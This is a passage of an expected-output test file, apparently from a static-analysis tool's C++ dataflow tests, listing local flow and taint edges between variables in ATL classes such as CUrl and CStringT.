atl.cpp:853:8:853:10 | call to CUrl | atl.cpp:901:1:901:1 | url | | -| atl.cpp:854:3:854:5 | ref arg url | atl.cpp:855:8:855:10 | url | | -| atl.cpp:854:3:854:5 | ref arg url | atl.cpp:856:8:856:10 | url | | -| atl.cpp:854:3:854:5 | ref arg url | atl.cpp:857:8:857:10 | url | | -| atl.cpp:854:3:854:5 | ref arg url | atl.cpp:858:8:858:10 | url | | -| atl.cpp:854:3:854:5 | ref arg url | atl.cpp:859:8:859:10 | url | | -| atl.cpp:854:3:854:5 | ref arg url | atl.cpp:860:8:860:10 | url | | -| atl.cpp:854:3:854:5 | ref arg url | atl.cpp:861:8:861:10 | url | | -| atl.cpp:854:3:854:5 | ref arg url | atl.cpp:901:1:901:1 | url | | -| atl.cpp:864:10:864:13 | call to CUrl | atl.cpp:867:5:867:8 | url2 | | -| atl.cpp:864:10:864:13 | call to CUrl | atl.cpp:868:5:868:8 | url2 | | -| atl.cpp:864:10:864:13 | call to CUrl | atl.cpp:870:3:870:3 | url2 | | -| atl.cpp:865:11:865:13 | len | atl.cpp:868:29:868:31 | len | | -| atl.cpp:866:10:866:15 | buffer | atl.cpp:868:20:868:25 | buffer | | -| atl.cpp:866:10:866:15 | buffer | atl.cpp:869:10:869:15 | buffer | | -| atl.cpp:867:5:867:8 | ref arg url2 | atl.cpp:868:5:868:8 | url2 | | -| atl.cpp:867:5:867:8 | ref arg url2 | atl.cpp:870:3:870:3 | url2 | | -| atl.cpp:868:20:868:25 | ref arg buffer | atl.cpp:869:10:869:15 | buffer | | -| atl.cpp:868:28:868:31 | ref arg & ... | atl.cpp:868:29:868:31 | len [inner post update] | | -| atl.cpp:868:29:868:31 | len | atl.cpp:868:28:868:31 | & ... | | -| atl.cpp:872:10:872:13 | call to CUrl | atl.cpp:873:5:873:8 | url2 | | -| atl.cpp:872:10:872:13 | call to CUrl | atl.cpp:874:10:874:13 | url2 | | -| atl.cpp:872:10:872:13 | call to CUrl | atl.cpp:875:3:875:3 | url2 | | -| atl.cpp:873:5:873:8 | ref arg url2 | atl.cpp:874:10:874:13 | url2 | | -| atl.cpp:873:5:873:8 | ref arg url2 | atl.cpp:875:3:875:3 | url2 | | -| atl.cpp:877:10:877:13 | call to CUrl | atl.cpp:878:5:878:8 | url2 | | -| atl.cpp:877:10:877:13 | call to CUrl | atl.cpp:879:10:879:13 | url2 | | -| atl.cpp:877:10:877:13 | call to CUrl | atl.cpp:880:3:880:3 | url2 | | -| atl.cpp:878:5:878:8 | ref arg url2 | atl.cpp:879:10:879:13 | url2 | | -| atl.cpp:878:5:878:8 | ref arg url2 | atl.cpp:880:3:880:3 | url2 | | -| atl.cpp:882:10:882:13 | call to CUrl | atl.cpp:883:5:883:8 | url2 | | -| atl.cpp:882:10:882:13 | call to CUrl | atl.cpp:884:10:884:13 | url2 | | -| atl.cpp:882:10:882:13 | call to CUrl | atl.cpp:885:3:885:3 | url2 | | -| atl.cpp:883:5:883:8 | ref arg url2 | atl.cpp:884:10:884:13 | url2 | | -| atl.cpp:883:5:883:8 | ref arg url2 | atl.cpp:885:3:885:3 | url2 | | -| atl.cpp:887:10:887:13 | call to CUrl | atl.cpp:888:5:888:8 | url2 | | -| atl.cpp:887:10:887:13 | call to CUrl | atl.cpp:889:10:889:13 | url2 | | -| atl.cpp:887:10:887:13 | call to CUrl | atl.cpp:890:3:890:3 | url2 | | -| atl.cpp:888:5:888:8 | ref arg url2 | atl.cpp:889:10:889:13 | url2 | | -| atl.cpp:888:5:888:8 | ref arg url2 | atl.cpp:890:3:890:3 | url2 | | -| atl.cpp:892:10:892:13 | call to CUrl | atl.cpp:893:5:893:8 | url2 | | -| atl.cpp:892:10:892:13 | call to CUrl | atl.cpp:894:10:894:13 | url2 | | -| atl.cpp:892:10:892:13 | call to CUrl | atl.cpp:895:3:895:3 | url2 | | -| atl.cpp:893:5:893:8 | ref arg url2 | atl.cpp:894:10:894:13 | url2 | | -| atl.cpp:893:5:893:8 | ref arg url2 | atl.cpp:895:3:895:3 | url2 | | -| atl.cpp:897:10:897:13 | call to CUrl | atl.cpp:898:5:898:8 | url2 | | -| atl.cpp:897:10:897:13 | call to CUrl | atl.cpp:899:10:899:13 | url2 | | -| atl.cpp:897:10:897:13 | call to CUrl | atl.cpp:900:3:900:3 | url2 | | -| atl.cpp:898:5:898:8 | ref arg url2 | atl.cpp:899:10:899:13 | url2 | | -| atl.cpp:898:5:898:8 | ref arg url2 | atl.cpp:900:3:900:3 | url2 | | -| atl.cpp:954:13:954:33 | call to indirect_source | atl.cpp:956:27:956:27 | x | | -| atl.cpp:954:13:954:33 | call to indirect_source | atl.cpp:959:27:959:27 | x | | -| atl.cpp:954:13:954:33 | call to indirect_source | atl.cpp:978:44:978:44 | x | | -| atl.cpp:954:13:954:33 | call to indirect_source | atl.cpp:982:49:982:49 | x | | -| atl.cpp:954:13:954:33 | call to indirect_source | atl.cpp:986:54:986:54 | x | | -| atl.cpp:956:27:956:41 | call to CSimpleStringT | atl.cpp:957:8:957:9 | s1 | | -| atl.cpp:956:27:956:41 | call to CSimpleStringT | atl.cpp:1008:50:1008:51 | s1 | | -| atl.cpp:956:27:956:41 | call to CSimpleStringT | atl.cpp:1010:8:1010:9 | s1 | | -| atl.cpp:956:27:956:41 | call to CSimpleStringT | atl.cpp:1011:1:1011:1 | s1 | | -| atl.cpp:959:27:959:37 | call to CSimpleStringT | atl.cpp:960:8:960:9 | s2 | | -| atl.cpp:959:27:959:37 | call to CSimpleStringT | atl.cpp:962:27:962:28 | s2 | | -| atl.cpp:959:27:959:37 | call to CSimpleStringT | atl.cpp:1011:1:1011:1 | s2 | | -| atl.cpp:962:27:962:28 | s2 | atl.cpp:962:27:962:29 | call to CSimpleStringT | | -| atl.cpp:962:27:962:29 | call to CSimpleStringT | atl.cpp:963:8:963:9 | s3 | | -| atl.cpp:962:27:962:29 | call to CSimpleStringT | atl.cpp:1011:1:1011:1 | s3 | | -| atl.cpp:965:24:965:25 | call to CSimpleStringT | atl.cpp:966:3:966:4 | s4 | | -| atl.cpp:965:24:965:25 | call to CSimpleStringT | atl.cpp:967:8:967:9 | s4 | | -| atl.cpp:965:24:965:25 | call to CSimpleStringT | atl.cpp:970:13:970:14 | s4 | | -| atl.cpp:965:24:965:25 | call to CSimpleStringT | atl.cpp:989:8:989:9 | s4 | | -| atl.cpp:965:24:965:25 | call to CSimpleStringT | atl.cpp:990:8:990:9 | s4 | | -| atl.cpp:965:24:965:25 | call to CSimpleStringT | atl.cpp:991:8:991:9 | s4 | | -| atl.cpp:965:24:965:25 | call to CSimpleStringT | atl.cpp:992:8:992:9 | s4 | | -| atl.cpp:965:24:965:25 | call to CSimpleStringT | atl.cpp:994:8:994:9 | s4 | | -| atl.cpp:965:24:965:25 | call to CSimpleStringT | atl.cpp:1011:1:1011:1 | s4 | | -| atl.cpp:966:3:966:4 | ref arg s4 | atl.cpp:967:8:967:9 | s4 | | -| atl.cpp:966:3:966:4 | ref arg s4 | atl.cpp:970:13:970:14 | s4 | | -| atl.cpp:966:3:966:4 | ref arg s4 | atl.cpp:989:8:989:9 | s4 | | -| atl.cpp:966:3:966:4 | ref arg s4 | atl.cpp:990:8:990:9 | s4 | | -| atl.cpp:966:3:966:4 | ref arg s4 | atl.cpp:991:8:991:9 | s4 | | -| atl.cpp:966:3:966:4 | ref arg s4 | atl.cpp:992:8:992:9 | s4 | | -| atl.cpp:966:3:966:4 | ref arg s4 | atl.cpp:994:8:994:9 | s4 | | -| atl.cpp:966:3:966:4 | ref arg s4 | atl.cpp:1011:1:1011:1 | s4 | | -| atl.cpp:969:24:969:25 | call to CSimpleStringT | atl.cpp:970:3:970:4 | s5 | | -| atl.cpp:969:24:969:25 | call to CSimpleStringT | atl.cpp:971:8:971:9 | s5 | | -| atl.cpp:969:24:969:25 | call to CSimpleStringT | atl.cpp:1011:1:1011:1 | s5 | | -| atl.cpp:970:3:970:4 | ref arg s5 | atl.cpp:971:8:971:9 | s5 | | -| atl.cpp:970:3:970:4 | ref arg s5 | atl.cpp:1011:1:1011:1 | s5 | | -| atl.cpp:973:24:973:25 | call to CSimpleStringT | atl.cpp:974:3:974:4 | s6 | | -| atl.cpp:973:24:973:25 | call to CSimpleStringT | atl.cpp:975:8:975:9 | s6 | | -| atl.cpp:973:24:973:25 | call to CSimpleStringT | atl.cpp:1011:1:1011:1 | s6 | | -| atl.cpp:974:3:974:4 | ref arg s6 | atl.cpp:975:8:975:9 | s6 | | -| atl.cpp:974:3:974:4 | ref arg s6 | atl.cpp:1011:1:1011:1 | s6 | | -| atl.cpp:977:8:977:14 | buffer1 | atl.cpp:978:35:978:41 | buffer1 | | -| atl.cpp:977:8:977:14 | buffer1 | atl.cpp:979:8:979:14 | buffer1 | | -| atl.cpp:978:35:978:41 | ref arg buffer1 | atl.cpp:979:8:979:14 | buffer1 | | -| atl.cpp:981:8:981:14 | buffer2 | atl.cpp:982:35:982:41 | buffer2 | | -| atl.cpp:981:8:981:14 | buffer2 | atl.cpp:983:8:983:14 | buffer2 | | -| atl.cpp:982:35:982:41 | ref arg buffer2 | atl.cpp:983:8:983:14 | buffer2 | | -| atl.cpp:985:8:985:14 | buffer3 | atl.cpp:986:45:986:51 | buffer3 | | -| atl.cpp:985:8:985:14 | buffer3 | atl.cpp:987:8:987:14 | buffer3 | | -| atl.cpp:986:45:986:51 | ref arg buffer3 | atl.cpp:987:8:987:14 | buffer3 | | -| atl.cpp:990:8:990:9 | ref arg s4 | atl.cpp:991:8:991:9 | s4 | | -| atl.cpp:990:8:990:9 | ref arg s4 | atl.cpp:992:8:992:9 | s4 | | -| atl.cpp:990:8:990:9 | ref arg s4 | atl.cpp:994:8:994:9 | s4 | | -| atl.cpp:990:8:990:9 | ref arg s4 | atl.cpp:1011:1:1011:1 | s4 | | -| atl.cpp:991:8:991:9 | ref arg s4 | atl.cpp:992:8:992:9 | s4 | | -| atl.cpp:991:8:991:9 | ref arg s4 | atl.cpp:994:8:994:9 | s4 | | -| atl.cpp:991:8:991:9 | ref arg s4 | atl.cpp:1011:1:1011:1 | s4 | | -| atl.cpp:992:8:992:9 | ref arg s4 | atl.cpp:994:8:994:9 | s4 | | -| atl.cpp:992:8:992:9 | ref arg s4 | atl.cpp:1011:1:1011:1 | s4 | | -| atl.cpp:994:8:994:9 | ref arg s4 | atl.cpp:1011:1:1011:1 | s4 | | -| atl.cpp:996:24:996:25 | call to CSimpleStringT | atl.cpp:997:3:997:4 | s7 | | -| atl.cpp:996:24:996:25 | call to CSimpleStringT | atl.cpp:998:8:998:9 | s7 | | -| atl.cpp:996:24:996:25 | call to CSimpleStringT | atl.cpp:1011:1:1011:1 | s7 | | -| atl.cpp:997:3:997:4 | ref arg s7 | atl.cpp:998:8:998:9 | s7 | | -| atl.cpp:997:3:997:4 | ref arg s7 | atl.cpp:1011:1:1011:1 | s7 | | -| atl.cpp:1000:24:1000:25 | call to CSimpleStringT | atl.cpp:1001:3:1001:4 | s8 | | -| atl.cpp:1000:24:1000:25 | call to CSimpleStringT | atl.cpp:1002:8:1002:9 | s8 | | -| atl.cpp:1000:24:1000:25 | call to CSimpleStringT | atl.cpp:1011:1:1011:1 | s8 | | -| atl.cpp:1001:3:1001:4 | ref arg s8 | atl.cpp:1002:8:1002:9 | s8 | | -| atl.cpp:1001:3:1001:4 | ref arg s8 | atl.cpp:1011:1:1011:1 | s8 | | -| atl.cpp:1004:24:1004:25 | call to CSimpleStringT | atl.cpp:1005:3:1005:4 | s9 | | -| atl.cpp:1004:24:1004:25 | call to CSimpleStringT | atl.cpp:1006:8:1006:9 | s9 | | -| atl.cpp:1004:24:1004:25 | call to CSimpleStringT | atl.cpp:1011:1:1011:1 | s9 | | -| atl.cpp:1005:3:1005:4 | ref arg s9 | atl.cpp:1006:8:1006:9 | s9 | | -| atl.cpp:1005:3:1005:4 | ref arg s9 | atl.cpp:1011:1:1011:1 | s9 | | -| atl.cpp:1099:15:1099:29 | call to source | atl.cpp:1101:21:1101:21 | v | | -| atl.cpp:1099:15:1099:29 | call to source | atl.cpp:1104:21:1104:21 | v | | -| atl.cpp:1101:21:1101:21 | v | atl.cpp:1101:21:1101:22 | call to CStringT | TAINT | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1102:8:1102:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1136:43:1136:44 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1138:15:1138:16 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1172:8:1172:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1178:8:1178:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1179:8:1179:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1180:8:1180:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1181:8:1181:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1194:3:1194:4 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1197:8:1197:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1198:8:1198:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1201:8:1201:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1203:8:1203:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1204:8:1204:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1205:8:1205:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1206:8:1206:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1207:8:1207:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1208:8:1208:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1209:8:1209:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1210:8:1210:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1211:8:1211:9 | s1 | | -| atl.cpp:1101:21:1101:22 | call to CStringT | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1104:21:1104:31 | call to CStringT | atl.cpp:1105:8:1105:9 | s2 | | -| atl.cpp:1104:21:1104:31 | call to CStringT | atl.cpp:1107:21:1107:22 | s2 | | -| atl.cpp:1104:21:1104:31 | call to CStringT | atl.cpp:1191:8:1191:9 | s2 | | -| atl.cpp:1104:21:1104:31 | call to CStringT | atl.cpp:1212:1:1212:1 | s2 | | -| atl.cpp:1107:21:1107:22 | s2 | atl.cpp:1107:21:1107:23 | call to CStringT | | -| atl.cpp:1107:21:1107:23 | call to CStringT | atl.cpp:1108:8:1108:9 | s3 | | -| atl.cpp:1107:21:1107:23 | call to CStringT | atl.cpp:1212:1:1212:1 | s3 | | -| atl.cpp:1110:13:1110:33 | call to indirect_source | atl.cpp:1111:21:1111:21 | x | | -| atl.cpp:1110:13:1110:33 | call to indirect_source | atl.cpp:1118:21:1118:21 | x | | -| atl.cpp:1110:13:1110:33 | call to indirect_source | atl.cpp:1165:17:1165:17 | x | | -| atl.cpp:1110:13:1110:33 | call to indirect_source | atl.cpp:1184:22:1184:22 | x | | -| atl.cpp:1111:21:1111:21 | ref arg x | atl.cpp:1118:21:1118:21 | x | | -| atl.cpp:1111:21:1111:21 | ref arg x | atl.cpp:1165:17:1165:17 | x | | -| atl.cpp:1111:21:1111:21 | ref arg x | atl.cpp:1184:22:1184:22 | x | | -| atl.cpp:1111:21:1111:21 | x | atl.cpp:1111:21:1111:22 | call to CStringT | TAINT | -| atl.cpp:1111:21:1111:22 | call to CStringT | atl.cpp:1112:8:1112:9 | s4 | | -| atl.cpp:1111:21:1111:22 | call to CStringT | atl.cpp:1212:1:1212:1 | s4 | | -| atl.cpp:1114:16:1114:39 | call to indirect_source | atl.cpp:1115:24:1115:24 | y | | -| atl.cpp:1114:16:1114:39 | call to indirect_source | atl.cpp:1121:24:1121:24 | y | | -| atl.cpp:1115:24:1115:24 | ref arg y | atl.cpp:1121:24:1121:24 | y | | -| atl.cpp:1115:24:1115:24 | y | atl.cpp:1115:24:1115:25 | call to CStringT | TAINT | -| atl.cpp:1115:24:1115:25 | call to CStringT | atl.cpp:1116:8:1116:9 | s5 | | -| atl.cpp:1115:24:1115:25 | call to CStringT | atl.cpp:1212:1:1212:1 | s5 | | -| atl.cpp:1118:21:1118:31 | call to CStringT | atl.cpp:1119:8:1119:9 | s6 | | -| atl.cpp:1118:21:1118:31 | call to CStringT | atl.cpp:1212:1:1212:1 | s6 | | -| atl.cpp:1121:24:1121:34 | call to CStringT | atl.cpp:1122:8:1122:9 | s7 | | -| atl.cpp:1121:24:1121:34 | call to CStringT | atl.cpp:1212:1:1212:1 | s7 | | -| atl.cpp:1124:24:1124:53 | call to indirect_source | atl.cpp:1125:21:1125:23 | ucs | | -| atl.cpp:1125:21:1125:23 | ucs | atl.cpp:1125:21:1125:24 | call to CStringT | TAINT | -| atl.cpp:1125:21:1125:24 | call to CStringT | atl.cpp:1126:8:1126:9 | s8 | | -| atl.cpp:1125:21:1125:24 | call to CStringT | atl.cpp:1212:1:1212:1 | s8 | | -| atl.cpp:1128:12:1128:23 | call to source | atl.cpp:1129:21:1129:21 | c | | -| atl.cpp:1129:21:1129:21 | c | atl.cpp:1129:21:1129:22 | call to CStringT | TAINT | -| atl.cpp:1129:21:1129:22 | call to CStringT | atl.cpp:1130:8:1130:9 | s9 | | -| atl.cpp:1129:21:1129:22 | call to CStringT | atl.cpp:1212:1:1212:1 | s9 | | -| atl.cpp:1132:16:1132:30 | call to source | atl.cpp:1133:25:1133:26 | wc | | -| atl.cpp:1133:25:1133:26 | wc | atl.cpp:1133:25:1133:27 | call to CStringT | TAINT | -| atl.cpp:1133:25:1133:27 | call to CStringT | atl.cpp:1134:8:1134:10 | s10 | | -| atl.cpp:1133:25:1133:27 | call to CStringT | atl.cpp:1212:1:1212:1 | s10 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1172:8:1172:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1178:8:1178:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1179:8:1179:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1180:8:1180:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1181:8:1181:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1194:3:1194:4 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1197:8:1197:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1198:8:1198:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1201:8:1201:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1203:8:1203:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1204:8:1204:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1205:8:1205:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1206:8:1206:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1207:8:1207:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1208:8:1208:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1209:8:1209:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1210:8:1210:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1211:8:1211:9 | s1 | | -| atl.cpp:1138:15:1138:16 | ref arg s1 | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1138:18:1138:31 | call to AllocSysString | atl.cpp:1139:8:1139:11 | bstr | | -| atl.cpp:1141:18:1141:20 | call to CStringT | atl.cpp:1142:3:1142:5 | s11 | | -| atl.cpp:1141:18:1141:20 | call to CStringT | atl.cpp:1143:8:1143:10 | s11 | | -| atl.cpp:1141:18:1141:20 | call to CStringT | atl.cpp:1212:1:1212:1 | s11 | | -| atl.cpp:1142:3:1142:5 | ref arg s11 | atl.cpp:1143:8:1143:10 | s11 | | -| atl.cpp:1142:3:1142:5 | ref arg s11 | atl.cpp:1212:1:1212:1 | s11 | | -| atl.cpp:1145:18:1145:20 | call to CStringT | atl.cpp:1146:3:1146:5 | s12 | | -| atl.cpp:1145:18:1145:20 | call to CStringT | atl.cpp:1147:8:1147:10 | s12 | | -| atl.cpp:1145:18:1145:20 | call to CStringT | atl.cpp:1212:1:1212:1 | s12 | | -| atl.cpp:1146:3:1146:5 | ref arg s12 | atl.cpp:1147:8:1147:10 | s12 | | -| atl.cpp:1146:3:1146:5 | ref arg s12 | atl.cpp:1212:1:1212:1 | s12 | | -| atl.cpp:1149:18:1149:20 | call to CStringT | atl.cpp:1150:3:1150:5 | s13 | | -| atl.cpp:1149:18:1149:20 | call to CStringT | atl.cpp:1151:8:1151:10 | s13 | | -| atl.cpp:1149:18:1149:20 | call to CStringT | atl.cpp:1212:1:1212:1 | s13 | | -| atl.cpp:1150:3:1150:5 | ref arg s13 | atl.cpp:1151:8:1151:10 | s13 | | -| atl.cpp:1150:3:1150:5 | ref arg s13 | atl.cpp:1212:1:1212:1 | s13 | | -| atl.cpp:1153:18:1153:20 | call to CStringT | atl.cpp:1154:3:1154:5 | s14 | | -| atl.cpp:1153:18:1153:20 | call to CStringT | atl.cpp:1155:8:1155:10 | s14 | | -| atl.cpp:1153:18:1153:20 | call to CStringT | atl.cpp:1212:1:1212:1 | s14 | | -| atl.cpp:1154:3:1154:5 | ref arg s14 | atl.cpp:1155:8:1155:10 | s14 | | -| atl.cpp:1154:3:1154:5 | ref arg s14 | atl.cpp:1212:1:1212:1 | s14 | | -| atl.cpp:1157:18:1157:20 | call to CStringT | atl.cpp:1158:3:1158:5 | s15 | | -| atl.cpp:1157:18:1157:20 | call to CStringT | atl.cpp:1159:8:1159:10 | s15 | | -| atl.cpp:1157:18:1157:20 | call to CStringT | atl.cpp:1212:1:1212:1 | s15 | | -| atl.cpp:1158:3:1158:5 | ref arg s15 | atl.cpp:1159:8:1159:10 | s15 | | -| atl.cpp:1158:3:1158:5 | ref arg s15 | atl.cpp:1212:1:1212:1 | s15 | | -| atl.cpp:1161:18:1161:20 | call to CStringT | atl.cpp:1162:3:1162:5 | s16 | | -| atl.cpp:1161:18:1161:20 | call to CStringT | atl.cpp:1212:1:1212:1 | s16 | | -| atl.cpp:1162:3:1162:5 | ref arg s16 | atl.cpp:1212:1:1212:1 | s16 | | -| atl.cpp:1164:18:1164:20 | call to CStringT | atl.cpp:1165:3:1165:5 | s17 | | -| atl.cpp:1164:18:1164:20 | call to CStringT | atl.cpp:1166:8:1166:10 | s17 | | -| atl.cpp:1164:18:1164:20 | call to CStringT | atl.cpp:1212:1:1212:1 | s17 | | -| atl.cpp:1165:3:1165:5 | ref arg s17 | atl.cpp:1166:8:1166:10 | s17 | | -| atl.cpp:1165:3:1165:5 | ref arg s17 | atl.cpp:1212:1:1212:1 | s17 | | -| atl.cpp:1168:18:1168:20 | call to CStringT | atl.cpp:1169:3:1169:5 | s18 | | -| atl.cpp:1168:18:1168:20 | call to CStringT | atl.cpp:1170:8:1170:10 | s18 | | -| atl.cpp:1168:18:1168:20 | call to CStringT | atl.cpp:1212:1:1212:1 | s18 | | -| atl.cpp:1169:3:1169:5 | ref arg s18 | atl.cpp:1170:8:1170:10 | s18 | | -| atl.cpp:1169:3:1169:5 | ref arg s18 | atl.cpp:1212:1:1212:1 | s18 | | -| atl.cpp:1174:18:1174:20 | call to CStringT | atl.cpp:1175:3:1175:5 | s20 | | -| atl.cpp:1174:18:1174:20 | call to CStringT | atl.cpp:1176:8:1176:10 | s20 | | -| atl.cpp:1174:18:1174:20 | call to CStringT | atl.cpp:1212:1:1212:1 | s20 | | -| atl.cpp:1175:3:1175:5 | ref arg s20 | atl.cpp:1176:8:1176:10 | s20 | | -| atl.cpp:1175:3:1175:5 | ref arg s20 | atl.cpp:1212:1:1212:1 | s20 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1179:8:1179:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1180:8:1180:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1181:8:1181:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1194:3:1194:4 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1197:8:1197:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1198:8:1198:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1201:8:1201:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1203:8:1203:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1204:8:1204:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1205:8:1205:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1206:8:1206:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1207:8:1207:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1208:8:1208:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1209:8:1209:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1210:8:1210:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1211:8:1211:9 | s1 | | -| atl.cpp:1178:8:1178:9 | ref arg s1 | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1180:8:1180:9 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1181:8:1181:9 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1194:3:1194:4 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1197:8:1197:9 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1198:8:1198:9 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1201:8:1201:9 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1203:8:1203:9 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1204:8:1204:9 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1205:8:1205:9 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1206:8:1206:9 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1207:8:1207:9 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1208:8:1208:9 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1209:8:1209:9 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1210:8:1210:9 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1211:8:1211:9 | s1 | | -| atl.cpp:1179:8:1179:9 | ref arg s1 | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1181:8:1181:9 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1194:3:1194:4 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1197:8:1197:9 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1198:8:1198:9 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1201:8:1201:9 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1203:8:1203:9 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1204:8:1204:9 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1205:8:1205:9 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1206:8:1206:9 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1207:8:1207:9 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1208:8:1208:9 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1209:8:1209:9 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1210:8:1210:9 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1211:8:1211:9 | s1 | | -| atl.cpp:1180:8:1180:9 | ref arg s1 | atl.cpp:1212:1:1212:1 | s1 | | -| atl.cpp:1183:18:1183:20 | call to CStringT | atl.cpp:1184:3:1184:5 | s21 | | -| atl.cpp:1183:18:1183:20 | call to CStringT | atl.cpp:1185:8:1185:10 | s21 | | -| atl.cpp:1183:18:1183:20 | call to CStringT | atl.cpp:1212:1:1212:1 | s21 | | -| 